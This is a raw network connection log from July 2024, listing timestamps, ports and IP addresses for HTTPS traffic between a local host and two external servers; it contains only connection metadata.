Jul 27, 2024 07:30:18.797569036 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.797584057 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.797732115 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.797746897 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.797781944 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.797786951 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.797813892 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.797832012 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798321962 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798348904 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798374891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798379898 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798407078 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798424006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798722029 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798762083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798777103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798782110 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.798808098 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.798821926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.799324989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.799341917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.799420118 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.799424887 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.799479961 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.805952072 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.805968046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.806044102 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.806047916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.806082964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.806302071 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.806318045 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.806369066 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.806371927 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.806416035 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.857230902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.857249975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.857284069 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.857287884 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.857314110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.857332945 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.888851881 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.888878107 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.888921022 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.888926983 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.888957977 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.888967991 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.889699936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.889719963 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.889758110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.889763117 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.889791012 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.889806986 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890248060 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890264034 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890300989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890305042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890328884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890341997 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890475035 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890489101 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890527964 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890532017 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.890558004 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.890568972 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.891105890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.891124010 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.891160965 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.891165972 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.891191006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.891199112 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899490118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899503946 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899545908 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899553061 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899580956 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899591923 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899760008 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899774075 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899826050 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899831057 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.899857998 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.899874926 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.914587975 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.947972059 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.948009968 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.948041916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.948046923 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.948077917 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.948088884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.978991032 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.979012966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.979058981 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.979063988 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.979091883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.979115963 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980083942 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980107069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980149984 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980154037 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980189085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980205059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980505943 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980521917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980571985 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980576038 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980601072 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980608940 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980775118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980792046 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980829954 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980834961 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.980859041 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.980865955 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.981286049 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.981311083 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.981350899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.981355906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.981369019 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.981390953 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.981878996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.989886045 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.989906073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.989949942 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.989954948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.989980936 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.989990950 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.990323067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.990339994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.990375996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.990381002 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:18.990403891 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:18.990417957 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.038505077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.038517952 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.038569927 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.038574934 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.038603067 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.038620949 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.070625067 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.070638895 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.070700884 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.070705891 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.070740938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071002960 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071023941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071063042 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071067095 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071078062 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071113110 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071335077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071350098 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071389914 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071394920 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071412086 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071435928 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071614981 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071628094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071669102 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071675062 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.071691990 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.071711063 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.072148085 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.072163105 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.072212934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.072217941 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.072232008 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.072252989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.076838970 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080559015 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080593109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080619097 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080624104 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080651999 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080701113 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080811024 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080843925 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080878973 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080883026 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.080899000 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.080924988 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.129131079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.129146099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.129231930 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.129237890 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.129465103 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.160032034 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.160111904 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.160192966 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.160398006 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.160427094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.160458088 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.160464048 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.160490036 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.160507917 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.160777092 CEST	51813	443	192.168.2.5	167.235.128.153
Jul 27, 2024 07:30:19.160809040 CEST	443	51813	167.235.128.153	192.168.2.5
Jul 27, 2024 07:30:19.161367893 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161381006 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161422014 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.161427975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161458015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.161458015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.161747932 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161761999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161824942 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.161828041 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.161942959 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162163019 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162175894 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162221909 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162226915 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162250996 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162259102 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162576914 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162594080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162631035 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162636042 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.162659883 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.162674904 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.171130896 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171144962 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171185017 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.171189070 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171217918 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.171235085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.171459913 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171477079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171531916 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.171536922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.171593904 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.220459938 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.220475912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.220546007 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.220556974 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.220845938 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.251269102 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.251286030 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.251368999 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.251379013 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.251420975 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.252196074 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.252211094 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.252276897 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.252283096 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.252523899 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.252739906 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.252748966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.252800941 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.252806902 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253063917 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253094912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253117085 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.253123999 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253151894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.253171921 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.253457069 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253472090 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253516912 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.253520966 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.253540993 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.253565073 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.254143000 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.262554884 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.262573957 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.262661934 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.262669086 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.262728930 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.262996912 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.263010025 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.263062000 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.263067007 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.263097048 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.263108015 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.311316967 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.311337948 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.311412096 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.311420918 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.311480045 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.342086077 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342103004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342194080 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.342200994 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342847109 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342864990 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342920065 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.342924118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.342947006 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.342972040 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343456984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343472004 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343518019 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343521118 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343548059 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343556881 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343753099 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343774080 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343812943 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343820095 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.343841076 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.343858004 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.344145060 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.344197989 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.344197989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.344214916 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.344249010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.344259024 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.352891922 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.352905989 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.352957010 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.352972984 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.352988958 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.353015900 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.353429079 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.353445053 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.353487968 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.353492975 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.353518963 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.353533983 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.402069092 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.402090073 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.402157068 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.402164936 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.405956984 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.432651997 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.432668924 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.432751894 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.432766914 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.433675051 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.433695078 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.433736086 CEST	51812	443	192.168.2.5	185.149.100.242
Jul 27, 2024 07:30:19.433743000 CEST	443	51812	185.149.100.242	192.168.2.5
Jul 27, 2024 07:30:19.433757067 CEST	51812	443	192.168.2.5	185.149.100.242
